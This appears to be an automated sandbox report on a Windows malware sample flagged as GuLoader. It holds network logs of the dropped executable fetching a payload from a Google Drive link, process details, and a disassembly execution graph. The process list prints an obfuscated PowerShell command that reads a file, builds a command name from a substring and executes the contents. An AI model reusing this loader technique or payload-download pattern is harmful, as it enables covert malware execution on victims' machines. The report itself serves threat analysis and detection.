                                                                                              2025-01-11 02:53:49 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 64 70 70 6f 59 70 65 69 35 34 6b 68 67 6d 47 72 61 58 4d 79 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="zdppoYpei54khgmGraXMyA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              70192.168.2.453791172.217.16.2064437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:50 UTC428OUTGET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:50 UTC1920INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:50 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-DLcOHrMl_n1F7Q2wVL_eGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              71192.168.2.453792172.217.16.1294437824C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-11 02:53:51 UTC470OUTGET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:51 UTC1851INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC7CoJK4ARR12QuzzmIwJdqRgxRlzbs6XxRMxU4IKj4i5KetpINl-WgXqQ0qML_G75Mddp1txTA
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:51 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-T7LT2ZQehJxj0mJvCe6Uhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 53 42 56 58 66 4a 70 78 36 4e 6b 54 76 72 41 56 6c 70 5f 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uSBVXfJpx6NkTvrAVlp_OQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Statistics

                                                                                              CPU Usage

                                                                                              Click to jump to process

                                                                                              Memory Usage

                                                                                              Click to jump to process

                                                                                              High Level Behavior Distribution

                                                                                              Click to dive into process behavior distribution

                                                                                              Behavior

                                                                                              Click to jump to process

                                                                                              System Behavior

                                                                                              General

                                                                                              Target ID:0
                                                                                              Start time:21:51:46
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\Desktop\LMSxhK1u8Z.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\LMSxhK1u8Z.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'048'752 bytes
                                                                                              MD5 hash:F2827F013A265DE94993C62BF9756B00
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:low
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:1
                                                                                              Start time:21:51:49
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"powershell.exe" -windowstyle minimized "$Yderpunktets=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Jul.Emb';$Disna=$Yderpunktets.SubString(22405,3);.$Disna($Yderpunktets)"
                                                                                              Imagebase:0xec0000
                                                                                              File size:433'152 bytes
                                                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2002927074.0000000009A85000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:2
                                                                                              Start time:21:51:49
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                              Wow64 process (32bit):false
                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              Imagebase:0x7ff7699e0000
                                                                                              File size:862'208 bytes
                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Reputation:high
                                                                                              Has exited:true

                                                                                              General

                                                                                              Target ID:6
                                                                                              Start time:21:52:18
                                                                                              Start date:10/01/2025
                                                                                              Path:C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\Calcifuge.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:1'048'752 bytes
                                                                                              MD5 hash:F2827F013A265DE94993C62BF9756B00
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2918084212.0000000001805000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 58%, ReversingLabs
                                                                                              Reputation:low
                                                                                              Has exited:false

                                                                                              Disassembly

                                                                                              Reset < >

                                                                                                Execution Graph

                                                                                                Execution Coverage:22.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:21.7%
                                                                                                Total number of Nodes:1267
                                                                                                Total number of Limit Nodes:30
                                                                                                execution_graph 3396 401d41 GetDC GetDeviceCaps 3404 402ab3 3396->3404 3398 401d5f MulDiv ReleaseDC 3399 402ab3 18 API calls 3398->3399 3400 401d7e 3399->3400 3401 405d68 18 API calls 3400->3401 3402 401db7 CreateFontIndirectW 3401->3402 3403 4024e6 3402->3403 3405 405d68 18 API calls 3404->3405 3406 402ac7 3405->3406 3406->3398 3407 401a42 3408 402ab3 18 API calls 3407->3408 3409 401a48 3408->3409 3410 402ab3 18 API calls 3409->3410 3411 4019f0 3410->3411 3412 401cc6 3413 402ab3 18 API calls 3412->3413 3414 401cd9 SetWindowLongW 3413->3414 3415 40295d 3414->3415 3416 401dc7 3417 402ab3 18 API calls 3416->3417 3418 401dcd 3417->3418 3419 402ab3 18 API calls 3418->3419 3420 401dd6 3419->3420 3421 401de8 EnableWindow 3420->3421 3422 401ddd ShowWindow 3420->3422 3423 40295d 3421->3423 3422->3423 3424 401bca 3425 402ab3 18 API calls 3424->3425 3426 401bd1 3425->3426 3427 402ab3 18 API calls 3426->3427 3428 401bdb 3427->3428 3429 401beb 3428->3429 3431 402ad0 18 API calls 3428->3431 3430 401bfb 3429->3430 3432 402ad0 18 API calls 3429->3432 3433 401c06 3430->3433 3434 401c4a 3430->3434 3431->3429 3432->3430 3435 402ab3 18 API calls 3433->3435 3436 402ad0 18 API calls 3434->3436 3437 401c0b 3435->3437 3438 401c4f 3436->3438 3439 402ab3 18 API calls 3437->3439 3440 402ad0 18 API calls 3438->3440 3442 401c14 3439->3442 3441 401c58 FindWindowExW 3440->3441 3445 401c7a 3441->3445 3443 401c3a SendMessageW 3442->3443 3444 401c1c SendMessageTimeoutW 3442->3444 3443->3445 3444->3445 3446 4024ca 3447 402ad0 18 API calls 3446->3447 3448 4024d1 3447->3448 3451 4059cf GetFileAttributesW CreateFileW 3448->3451 3450 4024dd 3451->3450 3452 40194b 3453 402ab3 18 API calls 3452->3453 3454 401952 3453->3454 3455 402ab3 18 API calls 3454->3455 3456 40195c 3455->3456 3457 402ad0 18 API calls 3456->3457 3458 401965 3457->3458 3459 401979 lstrlenW 3458->3459 3461 4019b5 3458->3461 3460 401983 3459->3460 3460->3461 3465 405d46 lstrcpynW 3460->3465 3463 40199e 3463->3461 3464 4019ab lstrlenW 3463->3464 3464->3461 3465->3463 3466 40274b 3467 402ad0 18 API calls 3466->3467 3468 402759 3467->3468 3469 40276f 3468->3469 3470 402ad0 18 API calls 3468->3470 3471 4059aa 2 API calls 3469->3471 3470->3469 3472 402775 3471->3472 3492 4059cf GetFileAttributesW CreateFileW 3472->3492 3474 402782 3475 40282b 3474->3475 3476 40278e GlobalAlloc 3474->3476 3479 402833 DeleteFileW 3475->3479 3480 402846 3475->3480 3477 402822 CloseHandle 3476->3477 3478 4027a7 3476->3478 3477->3475 3493 403192 SetFilePointer 3478->3493 3479->3480 3482 4027ad 3483 403160 ReadFile 3482->3483 3484 4027b6 GlobalAlloc 3483->3484 3485 4027c6 3484->3485 3486 4027fa WriteFile GlobalFree 3484->3486 3487 402f38 33 API calls 3485->3487 3488 402f38 33 API calls 3486->3488 3491 4027d3 3487->3491 3489 40281f 3488->3489 3489->3477 3490 4027f1 GlobalFree 3490->3486 3491->3490 3492->3474 3493->3482 3497 40284c 3498 402ab3 18 API calls 3497->3498 3499 402852 3498->3499 3500 402875 3499->3500 3501 40288e 3499->3501 3507 402729 3499->3507 3502 40287a 3500->3502 3503 40288b 3500->3503 3504 4028a4 3501->3504 3505 402898 3501->3505 3511 405d46 lstrcpynW 3502->3511 3512 405c8d wsprintfW 3503->3512 3506 405d68 18 API calls 3504->3506 3508 402ab3 18 API calls 3505->3508 3506->3507 3508->3507 3511->3507 3512->3507 3513 40164d 3514 402ad0 18 API calls 3513->3514 3515 401653 3514->3515 3516 406089 2 API calls 3515->3516 3517 401659 3516->3517 3518 4019cf 3519 402ad0 18 API calls 3518->3519 3520 4019d6 3519->3520 3521 402ad0 18 API calls 3520->3521 3522 4019df 3521->3522 3523 4019e6 lstrcmpiW 3522->3523 3524 4019f8 lstrcmpW 3522->3524 3525 4019ec 3523->3525 3524->3525 2864 401e51 2865 402ad0 18 API calls 2864->2865 2866 401e57 2865->2866 2867 404ffa 25 API calls 2866->2867 2868 401e61 2867->2868 2882 4054c8 CreateProcessW 2868->2882 2871 401ec6 CloseHandle 2875 402729 2871->2875 2872 401e77 WaitForSingleObject 2873 401e89 2872->2873 2874 401e9b GetExitCodeProcess 2873->2874 2885 4060e9 2873->2885 2876 401eba 2874->2876 2877 401ead 2874->2877 2876->2871 2881 401eb8 2876->2881 2889 405c8d wsprintfW 2877->2889 2881->2871 2883 401e67 2882->2883 2884 4054f7 CloseHandle 2882->2884 2883->2871 2883->2872 2883->2875 2884->2883 2886 406106 PeekMessageW 2885->2886 2887 401e90 WaitForSingleObject 2886->2887 2888 4060fc DispatchMessageW 2886->2888 2887->2873 2888->2886 2889->2881 2890 402251 2891 40225f 2890->2891 2892 402259 2890->2892 2894 40226d 2891->2894 2895 402ad0 18 API calls 2891->2895 2893 402ad0 18 API calls 2892->2893 2893->2891 2896 40227b 2894->2896 2897 402ad0 18 API calls 2894->2897 2895->2894 2898 402ad0 18 API calls 2896->2898 2897->2896 2899 402284 WritePrivateProfileStringW 2898->2899 3526 4028d1 3527 402ab3 18 API calls 3526->3527 3528 4028d7 3527->3528 3529 40290a 3528->3529 3530 402729 3528->3530 3532 4028e5 3528->3532 3529->3530 3531 405d68 18 API calls 3529->3531 3531->3530 3532->3530 3534 405c8d wsprintfW 3532->3534 3534->3530 2900 401752 2901 402ad0 18 API calls 2900->2901 2902 401759 2901->2902 2903 401781 2902->2903 2904 401779 2902->2904 2961 405d46 lstrcpynW 2903->2961 2960 405d46 lstrcpynW 2904->2960 2907 40177f 2911 405fda 5 API calls 2907->2911 2908 40178c 2909 4057ae 3 API calls 2908->2909 2910 401792 lstrcatW 2909->2910 2910->2907 2933 40179e 2911->2933 2912 406089 2 API calls 2912->2933 2913 4059aa 2 API calls 2913->2933 2915 4017b0 CompareFileTime 2915->2933 2916 401870 2918 404ffa 25 API calls 2916->2918 2917 401847 2919 404ffa 25 API calls 2917->2919 2927 40185c 2917->2927 2920 40187a 2918->2920 2919->2927 2939 402f38 2920->2939 2923 4018a1 SetFileTime 2924 4018b3 CloseHandle 2923->2924 2926 4018c4 2924->2926 2924->2927 2925 405d68 18 API calls 2925->2933 2928 4018c9 2926->2928 2929 4018dc 2926->2929 2931 405d68 18 API calls 2928->2931 2932 405d68 18 API calls 2929->2932 2930 405d46 lstrcpynW 2930->2933 2934 4018d1 lstrcatW 2931->2934 2935 4018e4 2932->2935 2933->2912 2933->2913 2933->2915 2933->2916 2933->2917 2933->2925 2933->2930 2938 4059cf GetFileAttributesW CreateFileW 2933->2938 2962 405529 2933->2962 2934->2935 2937 405529 MessageBoxIndirectW 2935->2937 2937->2927 2938->2933 2941 402f53 2939->2941 2940 402f80 2966 403160 ReadFile 2940->2966 2941->2940 2968 403192 SetFilePointer 2941->2968 2945 4030f6 2947 4030fa 2945->2947 2948 403112 2945->2948 2946 402f9d GetTickCount 2952 40188d 2946->2952 2959 402fea 2946->2959 2949 403160 ReadFile 2947->2949 2951 403160 ReadFile 2948->2951 2948->2952 2953 40312d WriteFile 2948->2953 2949->2952 2950 403160 ReadFile 2950->2959 2951->2948 2952->2923 2952->2924 2953->2952 2954 403141 2953->2954 2954->2948 2954->2952 2955 403040 GetTickCount 2955->2959 2956 403065 MulDiv wsprintfW 2957 404ffa 25 API calls 2956->2957 2957->2959 2958 4030a9 WriteFile 2958->2952 2958->2959 2959->2950 2959->2952 2959->2955 2959->2956 2959->2958 2960->2907 2961->2908 2963 40553e 2962->2963 2964 40558a 2963->2964 2965 405552 MessageBoxIndirectW 2963->2965 2964->2933 2965->2964 2967 402f8b 2966->2967 2967->2945 2967->2946 2967->2952 2968->2940 3535 402452 3536 402bda 19 API calls 3535->3536 3537 40245c 3536->3537 3538 402ab3 18 API calls 3537->3538 3539 402465 3538->3539 3540 402489 RegEnumValueW 3539->3540 3541 40247d RegEnumKeyW 3539->3541 3543 402729 3539->3543 3542 4024a2 RegCloseKey 3540->3542 3540->3543 3541->3542 3542->3543 3545 4022d3 3546 402303 3545->3546 3547 4022d8 3545->3547 3549 402ad0 18 API calls 3546->3549 3548 402bda 19 API calls 3547->3548 3550 4022df 3548->3550 3551 40230a 3549->3551 3552 402ad0 18 API calls 3550->3552 3555 402320 3550->3555 3556 402b10 RegOpenKeyExW 3551->3556 3554 4022f0 RegDeleteValueW RegCloseKey 3552->3554 3554->3555 3559 402b3b 3556->3559 3564 402b87 3556->3564 3557 402b61 RegEnumKeyW 3558 402b73 RegCloseKey 3557->3558 3557->3559 3561 4060b0 3 API calls 3558->3561 3559->3557 3559->3558 3560 402b98 RegCloseKey 3559->3560 3562 402b10 3 API calls 3559->3562 3560->3564 3563 402b83 3561->3563 3562->3559 3563->3564 3565 402bb3 RegDeleteKeyW 3563->3565 3564->3555 3565->3564 3566 401ed4 3567 402ad0 18 API calls 3566->3567 3568 401edb 3567->3568 3569 406089 2 API calls 3568->3569 3570 401ee1 3569->3570 3571 401ef2 3570->3571 3573 405c8d wsprintfW 3570->3573 3573->3571 3574 4014d7 3575 402ab3 18 API calls 3574->3575 3576 4014dd Sleep 3575->3576 3578 40295d 3576->3578 3579 4036d8 3580 4036e3 3579->3580 3581 4036e7 3580->3581 3582 4036ea GlobalAlloc 3580->3582 3582->3581 3583 40155b 3584 402903 3583->3584 3587 405c8d wsprintfW 3584->3587 3586 402908 3587->3586 3588 4026dc 3589 4026db 3588->3589 3589->3588 3590 4026ec FindNextFileW 3589->3590 3592 4026f7 3589->3592 3591 40273e 3590->3591 3590->3592 3594 405d46 lstrcpynW 3591->3594 3594->3592 3085 4031dd #17 SetErrorMode OleInitialize 3086 4060b0 3 API calls 3085->3086 3087 403220 SHGetFileInfoW 3086->3087 3158 405d46 lstrcpynW 3087->3158 3089 40324b GetCommandLineW 3159 405d46 lstrcpynW 3089->3159 3091 40325d GetModuleHandleW 3092 403275 3091->3092 3093 4057db CharNextW 3092->3093 3094 403284 CharNextW 3093->3094 3105 403294 3094->3105 3095 403364 3096 403378 GetTempPathW 3095->3096 3160 4031a9 3096->3160 3098 403390 3100 403394 GetWindowsDirectoryW lstrcatW 3098->3100 3101 4033ea DeleteFileW 3098->3101 3099 4057db CharNextW 3099->3105 3103 4031a9 11 API calls 3100->3103 3168 402cff GetTickCount GetModuleFileNameW 3101->3168 3106 4033b0 3103->3106 3104 4033fe 3107 403496 3104->3107 3110 403486 3104->3110 3114 4057db CharNextW 3104->3114 3105->3095 3105->3099 3109 403366 3105->3109 3106->3101 3108 4033b4 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3106->3108 3253 403640 3107->3253 3113 4031a9 11 API calls 3108->3113 3250 405d46 lstrcpynW 3109->3250 3196 40371a 3110->3196 3117 4033e2 3113->3117 3118 403419 3114->3118 3117->3101 3117->3107 3125 403460 3118->3125 3126 4034c5 lstrcatW lstrcmpiW 3118->3126 3119 4035a5 3121 403628 ExitProcess 3119->3121 3123 4060b0 3 API calls 3119->3123 3120 4034af 3122 405529 MessageBoxIndirectW 3120->3122 3127 4034bd ExitProcess 3122->3127 3128 4035b4 3123->3128 3129 4058b6 18 API calls 3125->3129 3126->3107 3130 4034e1 CreateDirectoryW SetCurrentDirectoryW 3126->3130 3131 4060b0 3 API calls 3128->3131 3132 40346c 3129->3132 3133 403504 3130->3133 3134 4034f9 3130->3134 3137 4035bd 3131->3137 3132->3107 3251 405d46 lstrcpynW 3132->3251 3261 405d46 lstrcpynW 3133->3261 3260 405d46 lstrcpynW 3134->3260 3139 4060b0 3 API calls 3137->3139 3141 4035c6 3139->3141 3140 40347b 3252 405d46 lstrcpynW 3140->3252 3144 403614 ExitWindowsEx 3141->3144 3149 4035d4 GetCurrentProcess 3141->3149 3143 405d68 18 API calls 3145 403543 DeleteFileW 3143->3145 3144->3121 3146 403621 3144->3146 3147 403550 CopyFileW 3145->3147 3155 403512 3145->3155 3262 40140b 3146->3262 3147->3155 3151 4035e4 3149->3151 3150 403599 3152 405be0 40 API calls 3150->3152 3151->3144 3152->3107 3153 405be0 40 API calls 3153->3155 3154 405d68 18 API calls 3154->3155 3155->3143 3155->3150 3155->3153 3155->3154 3156 4054c8 2 API calls 3155->3156 3157 403584 CloseHandle 3155->3157 3156->3155 3157->3155 3158->3089 3159->3091 3161 405fda 5 API calls 3160->3161 3162 4031b5 3161->3162 3163 4031bf 3162->3163 3164 4057ae 3 API calls 3162->3164 3163->3098 3165 4031c7 CreateDirectoryW 3164->3165 3265 4059fe 3165->3265 3269 4059cf GetFileAttributesW CreateFileW 3168->3269 3170 402d3f 3189 402d4f 3170->3189 3270 405d46 lstrcpynW 3170->3270 3172 402d65 3173 4057fa 2 API calls 3172->3173 3174 402d6b 3173->3174 3271 405d46 lstrcpynW 3174->3271 3176 402d76 GetFileSize 3177 402e72 3176->3177 3195 402d8d 3176->3195 3272 402c9b 3177->3272 3179 402e7b 3181 402eab GlobalAlloc 3179->3181 3179->3189 3283 403192 SetFilePointer 3179->3283 3180 403160 ReadFile 3180->3195 3284 403192 SetFilePointer 3181->3284 3183 402ede 3186 402c9b 6 API calls 3183->3186 3185 402ec6 3188 402f38 33 API calls 3185->3188 3186->3189 3187 402e94 3190 403160 ReadFile 3187->3190 3193 402ed2 3188->3193 3189->3104 3191 402e9f 3190->3191 3191->3181 3191->3189 3192 402c9b 6 API calls 3192->3195 3193->3189 3193->3193 3194 402f0f SetFilePointer 3193->3194 3194->3189 3195->3177 3195->3180 3195->3183 3195->3189 3195->3192 3197 4060b0 3 API calls 3196->3197 3198 40372e 3197->3198 3199 403734 3198->3199 3200 403746 3198->3200 3294 405c8d wsprintfW 3199->3294 3201 405c13 3 API calls 3200->3201 3202 403776 3201->3202 3204 403795 lstrcatW 3202->3204 3206 405c13 3 API calls 3202->3206 3205 403744 3204->3205 3285 4039f0 3205->3285 3206->3204 3209 4058b6 18 API calls 3210 4037c7 3209->3210 3211 40385b 3210->3211 3213 405c13 3 API calls 3210->3213 3212 4058b6 18 API calls 3211->3212 3214 403861 3212->3214 3215 4037f9 3213->3215 3216 403871 LoadImageW 3214->3216 3217 405d68 18 API calls 3214->3217 3215->3211 3221 40381a lstrlenW 3215->3221 3224 4057db CharNextW 3215->3224 3218 403917 3216->3218 3219 403898 RegisterClassW 3216->3219 3217->3216 3220 40140b 2 API calls 3218->3220 3222 4038ce SystemParametersInfoW CreateWindowExW 3219->3222 3249 403921 3219->3249 3223 40391d 3220->3223 3225 403828 lstrcmpiW 3221->3225 3226 40384e 3221->3226 3222->3218 3231 4039f0 19 API calls 3223->3231 3223->3249 3229 403817 3224->3229 3225->3226 3227 403838 GetFileAttributesW 3225->3227 3228 4057ae 3 API calls 3226->3228 3230 403844 3227->3230 3232 403854 3228->3232 3229->3221 3230->3226 3233 4057fa 2 API calls 3230->3233 3234 40392e 3231->3234 3295 405d46 lstrcpynW 3232->3295 3233->3226 3236 40393a ShowWindow LoadLibraryW 3234->3236 3237 4039bd 3234->3237 3239 403960 GetClassInfoW 3236->3239 3240 403959 LoadLibraryW 3236->3240 3238 4050cd 5 API calls 3237->3238 3241 4039c3 3238->3241 3242 403974 GetClassInfoW RegisterClassW 3239->3242 3243 40398a DialogBoxParamW 3239->3243 3240->3239 3244 4039c7 3241->3244 3245 4039df 3241->3245 3242->3243 3246 40140b 2 API calls 3243->3246 3248 40140b 2 API calls 3244->3248 3244->3249 3247 40140b 2 API calls 3245->3247 3246->3249 3247->3249 3248->3249 3249->3107 3250->3096 3251->3140 3252->3110 3254 403658 3253->3254 3255 40364a CloseHandle 3253->3255 3297 403685 3254->3297 3255->3254 3258 4055d5 71 API calls 3259 40349f OleUninitialize 3258->3259 3259->3119 3259->3120 3260->3133 3261->3155 3263 401389 2 API calls 3262->3263 3264 401420 3263->3264 3264->3121 3266 405a0b GetTickCount GetTempFileNameW 3265->3266 3267 405a41 3266->3267 3268 4031db 3266->3268 3267->3266 3267->3268 3268->3098 3269->3170 3270->3172 3271->3176 3273 402ca4 3272->3273 3274 402cbc 3272->3274 3275 402cb4 3273->3275 3276 402cad DestroyWindow 3273->3276 3277 402cc4 3274->3277 3278 402ccc GetTickCount 3274->3278 3275->3179 3276->3275 3279 4060e9 2 API calls 3277->3279 3280 402cda CreateDialogParamW ShowWindow 3278->3280 3281 402cfd 